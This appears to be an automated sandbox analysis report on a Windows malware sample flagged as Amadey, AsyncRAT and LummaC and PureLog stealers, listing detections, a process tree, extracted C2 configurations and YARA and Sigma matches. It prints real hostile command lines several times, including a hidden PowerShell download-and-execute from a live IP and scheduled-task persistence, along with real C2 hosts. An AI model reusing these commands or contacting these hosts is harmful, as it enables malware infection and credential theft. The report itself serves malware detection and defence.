
Windows Analysis Report
QkRFz2sau5.exe

Overview

General Information

Sample name: QkRFz2sau5.exe
Analysis ID: 1611846
MD5: 1f52efaed8352cc7bb09755d30900e2e
SHA1: ae997617c4399fbba4eb692c0bba04a88141ad4e
SHA256: 284c0140353b4ff318b05940dfb1c555df0f5cdc93d7cdffd43a9362ba24e20a

Detection

Amadey, AsyncRAT, LiteHTTP Bot, LummaC Stealer, PureLog Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AsyncRAT
Yara detected LiteHTTP Bot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates HTA files
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64native
  • QkRFz2sau5.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\QkRFz2sau5.exe" MD5: 1F52EFAED8352CC7BB09755D30900E2E)
    • cmd.exe (PID: 5600 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 948 cmdline: schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
    • mshta.exe (PID: 7188 cmdline: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE (PID: 7068 cmdline: "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE" MD5: 6C050E46123A52196D2EBA9CCE989BCF)
          • skotes.exe (PID: 5176 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 6C050E46123A52196D2EBA9CCE989BCF)
  • mshta.exe (PID: 556 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 6476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • skotes.exe (PID: 2816 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6C050E46123A52196D2EBA9CCE989BCF)
  • skotes.exe (PID: 1388 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6C050E46123A52196D2EBA9CCE989BCF)
    • 9c1024a1f1.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe" MD5: C2C7D39D833E6BB3260147D6D46DD38B)
    • 935372fb1f.exe (PID: 280 cmdline: "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe" MD5: BC9AC830C5F153ADD0C6F32C17F0FF61)
    • 7ecb69d7f1.exe (PID: 7200 cmdline: "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)
      • cmd.exe (PID: 5584 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • tasklist.exe (PID: 1976 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3228 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 2816 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 5368 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 6664 cmdline: cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 2436 cmdline: extrac32 /Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 6084 cmdline: findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 4888 cmdline: cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6188 cmdline: cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Macromedia.com (PID: 3540 cmdline: Macromedia.com F MD5: 62D09F076E6E0240548C2F837536A46A)
          • schtasks.exe (PID: 7184 cmdline: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)
            • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • MSBuild.exe (PID: 6292 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
          • MSBuild.exe (PID: 1500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • choice.exe (PID: 5840 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • 33c3d7c7bd.exe (PID: 324 cmdline: "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe" MD5: DB3632EF37D9E27DFA2FD76F320540CA)
    • f891ed3167.exe (PID: 6064 cmdline: "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)
      • f891ed3167.exe (PID: 5848 cmdline: "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)
      • f891ed3167.exe (PID: 5544 cmdline: "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)
      • WerFault.exe (PID: 6740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 936 MD5: 40A149513D721F096DDF50C04DA2F01F)
    • f8e8a2d2f0.exe (PID: 4396 cmdline: "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)
      • f8e8a2d2f0.exe (PID: 2920 cmdline: "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" MD5: 911E84CAF2003FA338E75C94C0A13FA4)
      • WerFault.exe (PID: 5340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 908 MD5: 40A149513D721F096DDF50C04DA2F01F)
    • d9caf9fc21.exe (PID: 6088 cmdline: "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe" MD5: F071BEEBFF0BCFF843395DC61A8D53C8)
    • c7f37422c5.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe" MD5: DF98D01767142C162C79285A0788894E)
  • wscript.exe (PID: 2004 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • AchillesGuard.com (PID: 2308 cmdline: "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r" MD5: 62D09F076E6E0240548C2F837536A46A)
      • MSBuild.exe (PID: 1884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
{"C2 url": ["cozyhomevpibes.cyou", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "FATE99--test"}
{"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security
C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
Source | Rule | Description | Author | Strings
00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x9e31:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown
  • 0x9d9f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xb0f8:$a2: Stub.exe
  • 0xb188:$a2: Stub.exe
  • 0x6bbd:$a3: get_ActivatePong
  • 0x9fb7:$a4: vmware
  • 0x9e2f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x790c:$a6: get_SslClient
00000010.00000002.22377836357.0000000000413000.00000040.00000001.01000000.00000013.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
Source | Rule | Description | Author | Strings
29.3.Macromedia.com.4985ad0.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
29.3.Macromedia.com.4985ad0.0.unpack | rat_win_asyncrat | Detect AsyncRAT based on specific strings | Sekoia.io
  • 0x48fd:$str01: get_ActivatePong
  • 0x564c:$str02: get_SslClient
  • 0x5668:$str03: get_TcpClient
  • 0x3f13:$str04: get_SendSync
  • 0x3f63:$str05: get_IsConnected
  • 0x4692:$str06: set_UseShellExecute
  • 0x7e15:$str07: Pastebin
  • 0x7e97:$str08: Select * from AntivirusProduct
  • 0x8e38:$str09: Stub.exe
  • 0x8ec8:$str09: Stub.exe
  • 0x7bef:$str10: timeout 3 > NUL
  • 0x7adf:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
  • 0x7b6f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
29.3.Macromedia.com.4985ad0.0.unpack | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x7b71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
29.3.Macromedia.com.4985ad0.0.unpack | Windows_Trojan_Asyncrat_11a11ba1 | unknown | unknown
  • 0x7adf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x8e38:$a2: Stub.exe
  • 0x8ec8:$a2: Stub.exe
  • 0x48fd:$a3: get_ActivatePong
  • 0x7cf7:$a4: vmware
  • 0x7b6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x564c:$a6: get_SslClient
29.3.Macromedia.com.499e4c0.3.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
Source | Rule | Description | Author | Strings
amsi32_824.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_6476.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QkRFz2sau5.exe", ParentImage: C:\Users\user\Desktop\QkRFz2sau5.exe, ParentProcessId: 7252, ParentProcessName: QkRFz2sau5.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 5600, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\QkRFz2sau5.exe", ParentImage: C:\Users\user\Desktop\QkRFz2sau5.exe, ParentProcessId: 7252, ParentProcessName: QkRFz2sau5.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ProcessId: 7188, ProcessName: mshta.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Macromedia.com F, ParentImage: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com, ParentProcessId: 3540, ParentProcessName: Macromedia.com, ProcessCommandLine: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 7184, ProcessName: schtasks.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\QkRFz2sau5.exe", ParentImage: C:\Users\user\Desktop\QkRFz2sau5.exe, ParentProcessId: 7252, ParentProcessName: QkRFz2sau5.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ProcessId: 7188, ProcessName: mshta.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1412, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js", ProcessId: 2004, ProcessName: wscript.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 824, TargetFilename: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7188, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 824, ProcessName: powershell.exe
